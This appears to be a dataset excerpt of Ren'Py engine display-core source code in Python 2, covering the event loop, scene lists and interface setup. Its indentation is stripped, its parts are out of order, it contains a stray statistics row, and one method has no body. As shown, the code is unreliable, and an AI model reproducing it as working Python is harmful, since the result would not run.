renpy.loader.needs_autoreload = False
renpy.exports.reload_script()
for i in renpy.config.needs_redraw_callbacks:
if i():
needs_redraw = True
# Redraw the screen.
if (self.force_redraw or
((first_pass or not pygame.event.peek(ALL_EVENTS)) and
renpy.display.draw.should_redraw(needs_redraw, first_pass, can_block))):
self.force_redraw = False
renpy.display.render.process_redraws()
# If we have a movie, start showing it.
fullscreen_video = renpy.display.video.interact()
# Clean out the redraws, if we have to.
# renpy.display.render.kill_redraws()
self.text_rect = None
# Draw the screen.
self.frame_time = get_time()
renpy.audio.audio.advance_time() # Sets the time of all video frames.
self.draw_screen(root_widget, fullscreen_video, (not fullscreen_video) or video_frame_drawn)
if first_pass:
if not self.interact_time:
self.interact_time = max(self.frame_time, get_time() - self.frame_duration)
scene_lists.set_times(self.interact_time)
for k, v in self.transition_time.iteritems():
if v is None:
self.transition_time[k] = self.interact_time
renpy.display.render.adjust_render_cache_times(self.frame_time, self.interact_time)
frame += 1
renpy.config.frames += 1
# If profiling is enabled, report the profile time.
if renpy.config.profile or self.profile_once:
renpy.plog(0, "end frame")
renpy.performance.analyze()
renpy.performance.clear()
renpy.plog(0, "start frame")
self.profile_once = False
if first_pass and self.last_event and self.last_event.type in [ pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION ]:
x, y = renpy.display.draw.get_mouse_pos()
ev, x, y = renpy.display.emulator.emulator(self.last_event, x, y)
if self.ignore_touch:
x = -1
y = -1
if renpy.android and self.last_event.type == pygame.MOUSEBUTTONUP:
x = -1
y = -1
renpy.display.focus.mouse_handler(None, x, y, default=False)
needs_redraw = False
first_pass = False
pygame.time.set_timer(REDRAW, 0)
pygame.event.clear([REDRAW])
old_redraw_time = None
self.update_text_rect()
renpy.test.testexecution.execute()
# Move the mouse, if necessary.
if self.mouse_move is not None:
if not self.mouse_move.perform():
self.mouse_move = None
# Draw the mouse, if it needs drawing.
renpy.display.draw.update_mouse()
# See if we want to restart the interaction entirely.
if self.restart_interaction:
return True, None
# Determine if we need a redraw. (We want to run these
# functions, so we put them first to prevent short-circuiting.)
if renpy.display.video.frequent():
needs_redraw = True
video_frame_drawn = True
if renpy.display.render.check_redraws():
needs_redraw = True
# How many seconds until we timeout.
_timeout_in = 3600
# Handle the redraw timer.
redraw_time = renpy.display.render.redraw_time()
# We only need to set the REDRAW timer if we can block.
can_block = renpy.display.draw.can_block()
if self.maximum_framerate_time > get_time():
can_block = False
if (redraw_time is not None) and (not needs_redraw) and can_block:
if redraw_time != old_redraw_time:
time_left = redraw_time - get_time()
time_left = min(time_left, 3600)
_redraw_in = time_left
if time_left <= 0:
try:
pygame.event.post(self.redraw_event)
except:
pass
pygame.time.set_timer(REDRAW, 0)
else:
pygame.time.set_timer(REDRAW, max(int(time_left * 1000), 1))
old_redraw_time = redraw_time
else:
_redraw_in = 3600
pygame.time.set_timer(REDRAW, 0)
# Handle the timeout timer.
if not self.timeout_time:
pygame.time.set_timer(TIMEEVENT, 0)
else:
time_left = self.timeout_time - get_time()
time_left = min(time_left, 3600)
_timeout_in = time_left
if time_left <= 0:
self.timeout_time = None
pygame.time.set_timer(TIMEEVENT, 0)
self.post_time_event()
elif self.timeout_time != old_timeout_time:
# Always set to at least 1ms.
pygame.time.set_timer(TIMEEVENT, int(time_left * 1000 + 1))
old_timeout_time = self.timeout_time
if can_block or (frame >= renpy.config.idle_frame):
expensive = not ( needs_redraw or (_redraw_in < .2) or (_timeout_in < .2) or renpy.display.video.playing() )
self.idle_frame(can_block, expensive)
if needs_redraw or (not can_block) or self.mouse_move or renpy.display.video.playing():
renpy.plog(1, "pre peek")
ev = self.event_poll()
renpy.plog(1, "post peek {!r}", ev)
else:
renpy.plog(1, "pre wait")
ev = self.event_wait()
renpy.plog(1, "post wait {!r}", ev)
if ev.type == pygame.NOEVENT:
if can_block and (not needs_redraw) and (not self.prediction_coroutine) and (not self.mouse_move):
pygame.time.wait(1)
continue
# Recognize and ignore AltGr on Windows.
if ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_LCTRL:
ev2 = self.event_peek()
if (ev2 is not None) and (ev2.type == pygame.KEYDOWN):
if ev2.key == pygame.K_RALT:
continue
# Check to see if the OS is asking us to suspend (on Android
# and iOS.)
if self.check_suspend(ev):
continue
# Try to merge an TIMEEVENT with other timeevents.
if ev.type == TIMEEVENT:
old_timeout_time = None
pygame.event.clear([TIMEEVENT])
# On Android, where we have multiple mouse buttons, we can
# merge a mouse down and mouse up event with its successor. This
# prevents us from getting overwhelmed with too many events on
# a multitouch screen.
if android and (ev.type == pygame.MOUSEBUTTONDOWN or ev.type == pygame.MOUSEBUTTONUP):
pygame.event.clear(ev.type)
# Handle redraw timeouts.
if ev.type == REDRAW:
pygame.event.clear([REDRAW])
old_redraw_time = None
continue
# Handle periodic events. This includes updating the mouse timers (and through the loop,
# the mouse itself), and the audio system periodic calls.
if ev.type == PERIODIC:
events = 1 + len(pygame.event.get([PERIODIC]))
self.ticks += events
for i in renpy.config.periodic_callbacks:
i()
renpy.audio.audio.periodic()
renpy.display.tts.periodic()
continue
# Handle quit specially for now.
if ev.type == pygame.QUIT:
self.quit_event()
continue
# Ignore KEY-events while text is being edited (usually with an IME).
if ev.type == pygame.TEXTEDITING:
if ev.text:
self.text_editing = ev
else:
self.text_editing = None
elif ev.type == pygame.TEXTINPUT:
self.text_editing = None
elif self.text_editing and ev.type in [ pygame.KEYDOWN, pygame.KEYUP ]:
continue
if ev.type == pygame.VIDEOEXPOSE:
# Needed to force the display to redraw after expose in
# the software renderer.
renpy.game.interface.full_redraw = True
renpy.game.interface.force_redraw = True
if isinstance(renpy.display.draw, renpy.display.swdraw.SWDraw):
renpy.display.draw.full_redraw = True
continue
# Handle videoresize.
if ev.type == pygame.VIDEORESIZE:
evs = pygame.event.get([pygame.VIDEORESIZE])
if len(evs):
ev = evs[-1]
# We seem to get a spurious event like this when leaving
# fullscreen mode on windows.
if ev.w < 256 or ev.h < 256:
continue
size = (ev.w // self.dpi_scale, ev.h // self.dpi_scale)
# Refresh fullscreen status (e.g. user pressed Esc. in browser)
main_window = pygame.display.get_window()
self.fullscreen = main_window is not None and bool(main_window.get_window_flags() & (pygame.WINDOW_FULLSCREEN_DESKTOP|pygame.WINDOW_FULLSCREEN))
renpy.game.preferences.fullscreen = self.fullscreen
if pygame.display.get_surface().get_size() != ev.size:
self.set_mode(size)
if not self.fullscreen:
self.last_resize = size
continue
# If we're ignoring touch events, and get a mouse up, stop
# ignoring those events.
if self.ignore_touch and \
ev.type == pygame.MOUSEBUTTONUP and \
ev.button == 1:
self.ignore_touch = False
continue
# Merge mousemotion events.
if ev.type == pygame.MOUSEMOTION:
evs = pygame.event.get([pygame.MOUSEMOTION])
if len(evs):
ev = evs[-1]
if renpy.windows:
self.mouse_focused = True
# Handle mouse event time, and ignoring touch.
if ev.type == pygame.MOUSEMOTION or \
ev.type == pygame.MOUSEBUTTONDOWN or \
ev.type == pygame.MOUSEBUTTONUP:
self.mouse_event_time = renpy.display.core.get_time()
if self.ignore_touch:
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
# Handle focus notifications.
if ev.type == pygame.ACTIVEEVENT:
if ev.state & 1:
if not ev.gain:
renpy.display.focus.clear_focus()
self.mouse_focused = ev.gain
if ev.state & 2:
self.keyboard_focused = ev.gain
if ev.state & 4:
if ev.gain:
self.restored()
else:
self.iconified()
pygame.key.set_mods(0)
# This returns the event location. It also updates the
# mouse state as necessary.
x, y = renpy.display.draw.mouse_event(ev)
x, y = renpy.test.testmouse.get_mouse_pos(x, y)
ev, x, y = renpy.display.emulator.emulator(ev, x, y)
if ev is None:
continue
if not self.mouse_focused or self.ignore_touch:
x = -1
y = -1
# This can set the event to None, to ignore it.
ev = renpy.display.controller.event(ev)
if not ev:
continue
# Handle skipping.
renpy.display.behavior.skipping(ev)
self.event_time = end_time = get_time()
try:
if self.touch:
renpy.display.gesture.recognizer.event(ev, x, y) # @UndefinedVariable
# Handle the event normally.
rv = renpy.display.focus.mouse_handler(ev, x, y)
if rv is None:
rv = root_widget.event(ev, x, y, 0)
if rv is None:
rv = renpy.display.focus.key_handler(ev)
if rv is not None:
break
# Handle displayable inspector.
if renpy.config.inspector:
if renpy.display.behavior.map_event(ev, "inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.transient_layers + renpy.config.context_clear_layers + renpy.config.overlay_layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
elif renpy.display.behavior.map_event(ev, "full_inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
except IgnoreEvent:
# An ignored event can change the timeout. So we want to
# process an TIMEEVENT to ensure that the timeout is
# set correctly
if ev.type != TIMEEVENT:
self.post_time_event()
# Check again after handling the event.
needs_redraw |= renpy.display.render.check_redraws()
if self.restart_interaction:
return True, None
# If we were trans-paused and rv is true, suppress
# transitions up to the next interaction.
if trans_pause and rv:
self.suppress_transition = True
# But wait, there's more! The finally block runs some cleanup
# after this.
return False, rv
except EndInteraction as e:
return False, e.value
finally:
renpy.game.context().say_attributes = None
# Clean out the overlay layers.
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
# Stop ongoing preloading.
renpy.display.im.cache.end_tick()
# We no longer disable periodic between interactions.
# pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(TIMEEVENT, 0)
pygame.time.set_timer(REDRAW, 0)
self.consider_gc()
renpy.game.context().runtime += end_time - start_time
# Restart the old interaction, which also causes a
# redraw if needed.
self.restart_interaction = True
renpy.plog(1, "end interact_core")
# print("It took", frames, "frames.")
def timeout(self, offset):
if offset < 0:
return
if self.timeout_time:
self.timeout_time = min(self.event_time + offset, self.timeout_time)
else:
self.timeout_time = self.event_time + offset
def finish_pending(self):
"""
Called before a quit or restart to finish any pending work that might
block other threads.
"""
self.check_background_screenshot()
| 29.801997 | 175 | 0.56845 |
from __future__ import print_function
import renpy.display
import renpy.audio
import renpy.text
import renpy.test
import pygame_sdl2 as pygame
import sys
import os
import time
import cStringIO
import threading
import copy
import gc
import inspect
import_time = time.time()
try:
import android
except:
android = None
TIMEEVENT = pygame.event.register("TIMEEVENT")
PERIODIC = pygame.event.register("PERIODIC")
REDRAW = pygame.event.register("REDRAW")
EVENTNAME = pygame.event.register("EVENTNAME")
ALL_EVENTS = set(pygame.event.get_standard_events())
ALL_EVENTS.add(PERIODIC)
ALL_EVENTS.add(EVENTNAME)
enabled_events = {
pygame.QUIT,
pygame.APP_TERMINATING,
pygame.APP_LOWMEMORY,
pygame.APP_WILLENTERBACKGROUND,
pygame.APP_DIDENTERBACKGROUND,
pygame.APP_WILLENTERFOREGROUND,
pygame.APP_DIDENTERFOREGROUND,
pygame.WINDOWEVENT,
pygame.SYSWMEVENT,
pygame.KEYDOWN,
pygame.KEYUP,
pygame.TEXTEDITING,
pygame.TEXTINPUT,
pygame.MOUSEMOTION,
pygame.MOUSEBUTTONDOWN,
pygame.MOUSEBUTTONUP,
pygame.MOUSEWHEEL,
pygame.JOYAXISMOTION,
pygame.JOYHATMOTION,
pygame.JOYBALLMOTION,
pygame.JOYBUTTONDOWN,
pygame.JOYBUTTONUP,
pygame.JOYDEVICEADDED,
pygame.JOYDEVICEREMOVED,
pygame.CONTROLLERAXISMOTION,
pygame.CONTROLLERBUTTONDOWN,
pygame.CONTROLLERBUTTONUP,
pygame.CONTROLLERDEVICEADDED,
pygame.CONTROLLERDEVICEREMOVED,
pygame.RENDER_TARGETS_RESET,
TIMEEVENT,
PERIODIC,
REDRAW,
EVENTNAME,
}
PERIODIC_INTERVAL = 50
time_base = 0.0
time_mult = 1.0
def init_time():
warp = os.environ.get("RENPY_TIMEWARP", "1.0")
global time_base
global time_mult
time_base = time.time()
time_mult = float(warp)
def get_time():
t = time.time()
return time_base + (t - time_base) * time_mult
def displayable_by_tag(layer, tag):
return renpy.game.context().scene_lists.get_displayable_by_tag(layer, tag)
class IgnoreEvent(Exception):
pass
class EndInteraction(Exception):
def __init__(self, value):
self.value = value
class absolute(float):
__slots__ = [ ]
def place(width, height, sw, sh, placement):
xpos, ypos, xanchor, yanchor, xoffset, yoffset, _subpixel = placement
if xpos is None:
xpos = 0
if ypos is None:
ypos = 0
if xanchor is None:
xanchor = 0
if yanchor is None:
yanchor = 0
if xoffset is None:
xoffset = 0
if yoffset is None:
yoffset = 0
if xpos.__class__ is float:
xpos *= width
if xanchor.__class__ is float:
xanchor *= sw
x = xpos + xoffset - xanchor
if ypos.__class__ is float:
ypos *= height
if yanchor.__class__ is float:
yanchor *= sh
y = ypos + yoffset - yanchor
return x, y
class DisplayableArguments(renpy.object.Object):
name = ()
args = ()
prefix = None
lint = False
def copy(self, **kwargs):
rv = DisplayableArguments()
rv.__dict__.update(self.__dict__)
rv.__dict__.update(kwargs)
return rv
def extraneous(self):
if renpy.config.developer and renpy.config.report_extraneous_attributes:
raise Exception("Image '{}' does not accept attributes '{}'.".format(
" ".join(self.name),
" ".join(self.args),
))
default_style = renpy.style.Style("default")
class Displayable(renpy.object.Object):
# assume anything.
# If True this displayable can accept focus.
# If False, it can't, but it keeps its place in the focus order.
focusable = None
full_focus_name = None
role = ''
transform_event = None
# Can we change our look in response to transform_events?
transform_event_responder = False
# The main displayable, if this displayable is the root of a composite
# displayable. (This is used by SL to figure out where to add children
# to.) If None, it is itself.
_main = None
# A list of the children that make up this composite displayable.
_composite_parts = [ ]
# The location the displayable was created at, if known.
_location = None
# Does this displayable use the scope?
_uses_scope = False
# Arguments supplied to this displayable.
_args = DisplayableArguments()
# Set to true of the displayable is duplicatable (has a non-trivial
# duplicate method), or one of its children is.
_duplicatable = False
# Does this displayable require clipping?
_clipping = False
# Does this displayable have a tooltip?
_tooltip = None
def __ne__(self, o):
return not (self == o)
def __init__(self, focus=None, default=False, style='default', _args=None, tooltip=None, default_focus=False, **properties):
global default_style
if (style == "default") and (not properties):
self.style = default_style
else:
self.style = renpy.style.Style(style, properties) # @UndefinedVariable
self.focus_name = focus
self.default = default or default_focus
self._tooltip = tooltip
if _args is not None:
self._args = _args
def _copy(self, args=None):
rv = copy.copy(self)
if args is not None:
rv._args = args
return rv
def _duplicate(self, args):
if args and args.args:
args.extraneous()
return self
def _get_tooltip(self):
return self._tooltip
def _in_current_store(self):
return self
def _unique(self):
return
def parameterize(self, name, parameters):
a = self._args.copy(name=name, args=parameters)
return self._duplicate(a)
def _equals(self, o):
if type(self) is not type(o):
return False
if self.focus_name != o.focus_name:
return False
if self.style != o.style:
return False
if self.default != o.default:
return False
return True
def __unicode__(self):
return self.__class__.__name__
def __repr__(self):
return "<{} at {:x}>".format(unicode(self).encode("utf-8"), id(self))
def find_focusable(self, callback, focus_name):
focus_name = self.focus_name or focus_name
if self.focusable:
callback(self, focus_name)
elif self.focusable is not None:
callback(None, focus_name)
for i in self.visit():
if i is None:
continue
i.find_focusable(callback, focus_name)
def focus(self, default=False):
self.set_style_prefix(self.role + "hover_", True)
if not default:
renpy.exports.play(self.style.hover_sound)
def unfocus(self, default=False):
self.set_style_prefix(self.role + "idle_", True)
def is_focused(self):
if renpy.display.focus.grab and renpy.display.focus.grab is not self:
return
return renpy.game.context().scene_lists.focused is self
def set_style_prefix(self, prefix, root):
if prefix == self.style.prefix:
return
self.style.set_prefix(prefix)
renpy.display.render.redraw(self, 0)
def render(self, width, height, st, at):
raise Exception("Render not implemented.")
def event(self, ev, x, y, st):
return None
def get_placement(self):
return self.style.get_placement()
def visit_all(self, callback, seen=None):
if seen is None:
seen = set()
for d in self.visit():
if d is None:
continue
id_d = id(d)
if id_d in seen:
continue
seen.add(id_d)
d.visit_all(callback, seen)
callback(self)
def visit(self):
return [ ]
def per_interact(self):
return None
def predict_one(self):
return
def predict_one_action(self):
return
def place(self, dest, x, y, width, height, surf, main=True):
placement = self.get_placement()
subpixel = placement[6]
xpos, ypos = place(width, height, surf.width, surf.height, placement)
xpos += x
ypos += y
pos = (xpos, ypos)
if dest is not None:
if subpixel:
dest.subpixel_blit(surf, pos, main, main, None)
else:
dest.blit(surf, pos, main, main, None)
return pos
def set_transform_event(self, event):
if event == self.transform_event:
return
self.transform_event = event
if self.transform_event_responder:
renpy.display.render.redraw(self, 0)
def _handles_event(self, event):
return False
def _hide(self, st, at, kind):
return None
def _show(self):
def _target(self):
return self
def _change_transform_child(self, child):
return child
def _clear(self):
return
def _tts_common(self, default_alt=None):
rv = [ ]
for i in self.visit():
if i is not None:
speech = i._tts()
if speech.strip():
rv.append(speech)
rv = ": ".join(rv)
rv = rv.replace("::", ":")
rv = rv.replace(": :", ":")
alt = self.style.alt
if alt is None:
alt = default_alt
if alt is not None:
rv = renpy.substitutions.substitute(alt, scope={ "text" : rv })[0]
return rv
def _tts(self):
return self._tts_common()
def _tts_all(self):
return self._tts_common()
class SceneListEntry(renpy.object.Object):
def __init__(self, tag, zorder, show_time, animation_time, displayable, name):
self.tag = tag
self.zorder = zorder
self.show_time = show_time
self.animation_time = animation_time
self.displayable = displayable
self.name = name
def __iter__(self):
return iter((self.tag, self.zorder, self.show_time, self.animation_time, self.displayable))
def __getitem__(self, index):
return (self.tag, self.zorder, self.show_time, self.animation_time, self.displayable)[index]
def __repr__(self):
return "<SLE: %r %r %r>" % (self.tag, self.name, self.displayable)
def copy(self):
return SceneListEntry(
self.tag,
self.zorder,
self.show_time,
self.animation_time,
self.displayable,
self.name)
def update_time(self, time):
rv = self
if self.show_time is None or self.animation_time is None:
rv = self.copy()
rv.show_time = rv.show_time or time
rv.animation_time = rv.animation_time or time
return rv
class SceneLists(renpy.object.Object):
__version__ = 7
def after_setstate(self):
for i in renpy.config.layers + renpy.config.top_layers:
if i not in self.layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
def after_upgrade(self, version):
if version < 1:
self.at_list = { }
self.layer_at_list = { }
for i in renpy.config.layers + renpy.config.top_layers:
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
if version < 3:
self.shown_window = False
if version < 4:
for k in self.layers:
self.layers[k] = [ SceneListEntry(*(i + (None,)) ) for i in self.layers[k] ]
self.additional_transient = [ ]
if version < 5:
self.drag_group = None
if version < 6:
self.shown = self.image_predict_info
if version < 7:
self.layer_transform = { }
def __init__(self, oldsl, shown):
super(SceneLists, self).__init__()
# Has a window been shown as part of these scene lists?
self.shown_window = False
# A map from layer name -> list(SceneListEntry)
self.layers = { }
# A map from layer name -> tag -> at_list associated with that tag.
self.at_list = { }
# A map from layer to (star time, at_list), where the at list has
# been applied to the layer as a whole.
self.layer_at_list = { }
# The current shown images,
self.shown = shown
# A list of (layer, tag) pairs that are considered to be
# transient.
self.additional_transient = [ ]
# Either None, or a DragGroup that's used as the default for
self.drag_group = None
self.layer_transform = { }
if oldsl:
for i in renpy.config.layers + renpy.config.top_layers:
try:
self.layers[i] = oldsl.layers[i][:]
except KeyError:
self.layers[i] = [ ]
if i in oldsl.at_list:
self.at_list[i] = oldsl.at_list[i].copy()
self.layer_at_list[i] = oldsl.layer_at_list[i]
else:
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
for i in renpy.config.overlay_layers:
self.clear(i)
self.replace_transient(prefix=None)
self.focused = None
self.drag_group = oldsl.drag_group
self.layer_transform.update(oldsl.layer_transform)
else:
for i in renpy.config.layers + renpy.config.top_layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
self.music = None
self.focused = None
def replace_transient(self, prefix="hide"):
for i in renpy.config.transient_layers:
self.clear(i, True)
for layer, tag in self.additional_transient:
self.remove(layer, tag, prefix=prefix)
self.additional_transient = [ ]
def transient_is_empty(self):
for i in renpy.config.transient_layers:
if self.layers[i]:
return False
return True
def transform_state(self, old_thing, new_thing, execution=False):
if old_thing is None:
return new_thing
if isinstance(new_thing, renpy.display.screen.ScreenDisplayable):
return new_thing
if renpy.config.take_state_from_target:
old_transform = old_thing._target()
else:
old_transform = old_thing
if not isinstance(old_transform, renpy.display.motion.Transform):
return new_thing
if renpy.config.take_state_from_target:
new_transform = new_thing._target()
else:
new_transform = new_thing
if not isinstance(new_transform, renpy.display.motion.Transform):
new_thing = new_transform = renpy.display.motion.Transform(child=new_thing)
new_transform.take_state(old_transform)
if execution:
new_transform.take_execution_state(old_transform)
return new_thing
def find_index(self, layer, tag, zorder, behind):
add_index = None
remove_index = None
for i, sle in enumerate(self.layers[layer]):
if remove_index is None:
if (sle.tag and sle.tag == tag) or sle.displayable == tag:
remove_index = i
if zorder is None:
zorder = sle.zorder
if zorder is None:
zorder = renpy.config.tag_zorder.get(tag, 0)
for i, sle in enumerate(self.layers[layer]):
if add_index is None:
if sle.zorder == zorder:
if sle.tag and (sle.tag == tag or sle.tag in behind):
add_index = i
elif sle.zorder > zorder:
add_index = i
if add_index is None:
add_index = len(self.layers[layer])
return add_index, remove_index, zorder
def add(self,
layer,
thing,
key=None,
zorder=0,
behind=[ ],
at_list=[ ],
name=None,
atl=None,
default_transform=None,
transient=False,
keep_st=False):
if not isinstance(thing, Displayable):
raise Exception("Attempting to show something that isn't a displayable:" + repr(thing))
if layer not in self.layers:
raise Exception("Trying to add something to non-existent layer '%s'." % layer)
if key:
self.remove_hide_replaced(layer, key)
self.at_list[layer][key] = at_list
if key and name:
self.shown.predict_show(layer, name)
if transient:
self.additional_transient.append((layer, key))
l = self.layers[layer]
if atl:
thing = renpy.display.motion.ATLTransform(atl, child=thing)
add_index, remove_index, zorder = self.find_index(layer, key, zorder, behind)
at = None
st = None
if remove_index is not None:
sle = l[remove_index]
old = sle.displayable
at = sle.animation_time
if keep_st:
st = sle.show_time
if (not atl and
not at_list and
renpy.config.keep_running_transform and
isinstance(old, renpy.display.motion.Transform)):
thing = sle.displayable._change_transform_child(thing)
else:
thing = self.transform_state(l[remove_index].displayable, thing)
thing.set_transform_event("replace")
thing._show()
else:
if not isinstance(thing, renpy.display.motion.Transform):
thing = self.transform_state(default_transform, thing)
thing.set_transform_event("show")
thing._show()
sle = SceneListEntry(key, zorder, st, at, thing, name)
l.insert(add_index, sle)
if remove_index is not None:
if add_index <= remove_index:
remove_index += 1
self.hide_or_replace(layer, remove_index, "replaced")
def hide_or_replace(self, layer, index, prefix):
if index is None:
return
l = self.layers[layer]
oldsle = l[index]
now = get_time()
st = oldsle.show_time or now
at = oldsle.animation_time or now
if renpy.config.fast_unhandled_event:
if not oldsle.displayable._handles_event(prefix):
prefix = None
if (prefix is not None) and oldsle.tag:
d = oldsle.displayable._hide(now - st, now - at, prefix)
# _hide can mutate the layers, so we need to recompute
# index.
index = l.index(oldsle)
if d is not None:
sle = SceneListEntry(
prefix + "$" + oldsle.tag,
oldsle.zorder,
st,
at,
d,
None)
l[index] = sle
return
l.pop(index)
def get_all_displayables(self):
rv = [ ]
for l in self.layers.itervalues():
for sle in l:
rv.append(sle.displayable)
return rv
def remove_above(self, layer, thing):
for i in reversed(xrange(len(self.layers[layer]))):
sle = self.layers[layer][i]
if thing:
if sle.tag == thing or sle.displayable == thing:
break
if sle.tag and "$" in sle.tag:
continue
self.hide_or_replace(layer, i, "hide")
def remove(self, layer, thing, prefix="hide"):
if layer not in self.layers:
raise Exception("Trying to remove something from non-existent layer '%s'." % layer)
_add_index, remove_index, _zorder = self.find_index(layer, thing, 0, [ ])
if remove_index is not None:
tag = self.layers[layer][remove_index].tag
if tag:
self.shown.predict_hide(layer, (tag,))
self.at_list[layer].pop(tag, None)
self.hide_or_replace(layer, remove_index, prefix)
def clear(self, layer, hide=False):
if layer not in self.layers:
return
if not hide:
self.layers[layer] = [ ]
else:
# Have to iterate in reverse order, since otherwise
# the indexes might change.
for i in reversed(xrange(len(self.layers[layer]))):
self.hide_or_replace(layer, i, hide)
self.at_list[layer].clear()
self.shown.predict_scene(layer)
self.layer_at_list[layer] = (None, [ ])
def set_layer_at_list(self, layer, at_list, reset=True):
self.layer_at_list[layer] = (None, list(at_list))
if reset:
self.layer_transform[layer] = None
def set_times(self, time):
for l, (t, list) in self.layer_at_list.items(): # @ReservedAssignment
self.layer_at_list[l] = (t or time, list)
for l, ll in self.layers.iteritems():
self.layers[l] = [ i.update_time(time) for i in ll ]
def showing(self, layer, name):
return self.shown.showing(layer, name)
def get_showing_tags(self, layer):
return self.shown.get_showing_tags(layer)
def get_sorted_tags(self, layer):
rv = [ ]
for sle in self.layers[layer]:
if not sle.tag:
continue
if "$" in sle.tag:
continue
rv.append(sle.tag)
return rv
def make_layer(self, layer, properties):
rv = renpy.display.layout.MultiBox(layout='fixed', focus=layer, **properties)
rv.append_scene_list(self.layers[layer])
rv.layer_name = layer
rv._duplicatable = False
time, at_list = self.layer_at_list[layer]
old_transform = self.layer_transform.get(layer, None)
new_transform = None
if at_list:
for a in at_list:
if isinstance(a, renpy.display.motion.Transform):
rv = a(child=rv)
new_transform = rv
else:
rv = a(rv)
if (new_transform is not None) and (renpy.config.keep_show_layer_state):
self.transform_state(old_transform, new_transform, execution=True)
f = renpy.display.layout.MultiBox(layout='fixed')
f.add(rv, time, time)
f.layer_name = layer
rv = f
self.layer_transform[layer] = new_transform
return rv
def remove_hide_replaced(self, layer, tag):
hide_tag = "hide$" + tag
replaced_tag = "replaced$" + tag
l = self.layers[layer]
self.layers[layer] = [ i for i in l if i.tag != hide_tag and i.tag != replaced_tag ]
def remove_hidden(self):
now = get_time()
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if sle.tag.startswith("hide$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "hide")
if not d:
continue
elif sle.tag.startswith("replaced$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "replaced")
if not d:
continue
newl.append(sle)
self.layers[l] = newl
def remove_all_hidden(self):
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if "$" in sle.tag:
continue
newl.append(sle)
self.layers[l] = newl
def get_displayable_by_tag(self, layer, tag):
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
return sle.displayable
return None
def get_displayable_by_name(self, layer, name):
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.name == name:
return sle.displayable
return None
def get_image_bounds(self, layer, tag, width, height):
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
break
else:
return None
now = get_time()
if sle.show_time is not None:
st = now - sle.show_time
else:
st = 0
if sle.animation_time is not None:
at = now - sle.animation_time
else:
at = 0
surf = renpy.display.render.render_for_size(sle.displayable, width, height, st, at)
sw = surf.width
sh = surf.height
x, y = place(width, height, sw, sh, sle.displayable.get_placement())
return (x, y, sw, sh)
def scene_lists(index=-1):
return renpy.game.context(index).scene_lists
class MouseMove(object):
def __init__(self, x, y, duration):
self.start = get_time()
if duration is not None:
self.duration = duration
else:
self.duration = 0
self.start_x, self.start_y = renpy.display.draw.get_mouse_pos()
self.end_x = x
self.end_y = y
def perform(self):
elapsed = get_time() - self.start
if elapsed >= self.duration:
renpy.display.draw.set_mouse_pos(self.end_x, self.end_y)
return False
done = 1.0 * elapsed / self.duration
x = int(self.start_x + done * (self.end_x - self.start_x))
y = int(self.start_y + done * (self.end_y - self.start_y))
renpy.display.draw.set_mouse_pos(x, y)
return True
def get_safe_mode():
if renpy.safe_mode_checked:
return False
try:
if renpy.windows:
import ctypes
VK_SHIFT = 0x10
ctypes.windll.user32.GetKeyState.restype = ctypes.c_ushort
if ctypes.windll.user32.GetKeyState(VK_SHIFT) & 0x8000:
return True
else:
return False
# Safe mode doesn't work on other platforms.
return False
except:
return False
initial_maximum_framerate = 0.0
class Interface(object):
def __init__(self):
self.screenshot = None
self.screenshot_surface = None
self.old_scene = { }
self.transition = { }
self.ongoing_transition = { }
self.transition_time = { }
self.transition_from = { }
self.suppress_transition = False
self.quick_quit = False
self.force_redraw = False
self.restart_interaction = False
self.pushed_event = None
self.ticks = 0
self.mouse = 'default'
self.timeout_time = None
self.last_event = None
self.current_context = None
self.roll_forward = None
self.preloads = [ ]
self.frame_time = 0
self.interact_time = None
self.quit_time = 0
self.in_quit_event = False
self.time_event = pygame.event.Event(TIMEEVENT)
self.redraw_event = pygame.event.Event(REDRAW)
self.mouse_focused = True
self.keyboard_focused = True
self.layer_properties = { }
self.shown_window = False
self.fullscreen = False
self.ignore_touch = False
self.clear_screenshot = False
for layer in renpy.config.layers + renpy.config.top_layers:
if layer in renpy.config.layer_clipping:
x, y, w, h = renpy.config.layer_clipping[layer]
self.layer_properties[layer] = dict(
xpos=x,
xanchor=0,
ypos=y,
yanchor=0,
xmaximum=w,
ymaximum=h,
xminimum=w,
yminimum=h,
clipping=True,
)
else:
self.layer_properties[layer] = dict()
self.transition_info_stack = [ ]
self.event_time = 0
self.mouse_event_time = None
self.show_mouse = True
self.display_reset = False
self.last_resize = None
self.thread = threading.current_thread()
renpy.audio.audio.init()
try:
pygame.display.init()
except:
pass
init_time()
self.mouse_event_time = get_time()
self.window_caption = None
renpy.game.interface = self
renpy.display.interface = self
self.safe_mode = False
self.bgscreenshot_needed = False
self.bgscreenshot_event = threading.Event()
self.bgscreenshot_surface = None
self.mouse_move = None
self.text_editing = None
self.text_rect = None
self.old_text_rect = None
self.touch = renpy.exports.variant("touch")
self.restart_interaction = True
if renpy.config.periodic_callback:
renpy.config.periodic_callbacks.append(renpy.config.periodic_callback)
renpy.display.emulator.init_emulator()
self.started = False
self.fullscreen_video = False
self.safe_mode = get_safe_mode()
renpy.safe_mode_checked = True
self.dpi_scale = self.setup_dpi_scaling()
renpy.display.log.write("DPI scale factor: %f", self.dpi_scale)
self.maximum_framerate_time = 0.0
